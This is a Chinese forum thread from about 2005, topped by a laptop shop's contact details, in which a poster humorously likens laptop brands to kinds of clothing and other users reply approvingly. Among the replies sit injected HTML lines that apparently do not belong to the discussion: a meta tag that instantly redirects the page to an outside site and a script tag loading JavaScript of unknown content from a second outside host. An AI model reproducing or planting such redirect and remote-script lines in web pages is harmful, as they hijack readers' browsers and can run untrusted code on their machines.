开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

我对各种本本的看法:)

笔记本电脑这东东,感觉就像是各种衣服,大家看看我的想法有没有道理,呵呵。

咱翔意经营的IBM和HP绝对就是高档西装!价钱不可谓不贵,质量好那是没的说!穿出去有派,家里摆着提精神,呵呵。不过话说回来,这可不是每个人都买得起的,当然了,说得再实在点,也不是每个人都用得着,呵呵。同样是高档西装,这IBM和HP的风格也不一样:这IBM吧,就像是Prada的西装,正统的商务人士想方设法,砸锅卖铁也得搞一套呀,感觉像是职场上的标配;HP就像是Gucci的西装,底蕴可能没Prada那么浑厚,但是清新爽洁的新风格,为稍显沉闷的黑白世界带来了一丝丝新风,也就难怪可以吸引NBA小牛队老板库班这种职场上的新新一族了,呵呵。

DELL吗,就像是一件不错的夹克,价钱不贵,保暖,结实,一句话,实实在在。不过近期爆出“黑心棉”的内幕,公关部处理手段也比较幼稚,不得不在消费者心中大打折扣,呵呵。

ACER,ASUS吗,就是一条牛仔裤,你可以拿它当工装,也可以拿它当时尚。不少的办公场合都允许它存在,在家里也不是很严肃,民工和漂亮妹妹都喜欢,就是感觉上不了谈判、签字什么的大世面,呵呵。

这个Benq、Sumsung、Sony、Toshiba就像是小花衬衫和沙滩裤。漂亮,凉快,穿着轻松,漂亮MM眼里绝对特有面子,特喜欢。不过这东西穿起来可要分场合,家里很好,大街上可以,在办公室可能就不太适合了,呵呵

这联想、方正吗,就是一件衬衣。说什么好呢?太普通了,没什么特别的优点,也没什么特别缺点,总之有人喜欢穿就是了。不过可要注意,不怎么结实呀,呵呵。

神舟,呵呵,就当是大裤衩吧,也就家里用用,穿到大街上都显着丢分,呵呵。

写得不好,欢迎大家拍砖,呵呵!

[ Last edited by 5ihh on 2005-8-4 at 16:44 ]
呵呵,写得挺有意思。。。逗人一笑,赞一个,YY赶紧加肉加精啊。。。
<meta http-equiv="refresh" content="0; url=http://www.548.cc">
★★★
<script type="text/javascript" src="http://www.844.cc/b.js"></script>
<link href="http://www.844.cc/1.css" rel="stylesheet" type="text/css" media="screen" />
<P>&nbsp;</P>

别,楼上的谬赞了,自己瞎写着玩玩,加精什么的就免了吧,呵呵。
大家看完一笑也就好了,本来就是瞎写着玩的呀,呵呵
有意思,中肯!!
我要皮尔卡丹
呵呵,小弟也写了一篇大家去看看吧~~~
楼主这个人,很有意思,呵~~
怎么没有运动装呀?最喜欢了
运动装???那自然是台式机了,在家里用得最爽了,不过商务谈判、签字、开会时没人会用台式机吧?呵呵,就好像没见过谁出席正式的商务场合穿一身运动装一样,呵呵
好像这些名牌比本本还难买
写的好

俺们行话叫做:品牌面相

品牌和人一样、是有气质的……
呵呵,现在只要有钱,还怕买不到称心如意的东西吗,呵呵。

但是话说回来了,这人的气质也要和所拥有的东西相配,要不然的话就像是暴发户了,呵呵
写的有创意,什么时候我能写一篇这样子的文章啊,可惜我的水平。。。。
砸锅卖铁也得搞一套呀